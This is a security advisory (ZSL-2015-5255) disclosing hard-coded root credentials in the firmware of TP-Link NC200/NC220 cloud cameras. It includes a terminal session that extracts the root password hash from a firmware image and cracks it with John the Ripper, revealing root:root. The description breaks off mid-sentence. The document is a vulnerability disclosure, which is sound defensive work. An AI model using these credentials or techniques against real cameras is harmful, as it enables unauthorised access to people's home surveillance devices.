TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
NC200 V1 2.0.15 Build 150701 Rel.20962
Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
fast and trouble free way to keep track on what's going on in and around
your home. Video monitoring, recording and sharing has never been easier
with the use of TP-LINK’s Cloud service. The excitement of possibilities
never end.
Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials (root:root) are never exposed
to the end-user and cannot be changed through any normal operation of the
Tested on: Linux
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root (root)
guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh
1 password hash cracked, 0 left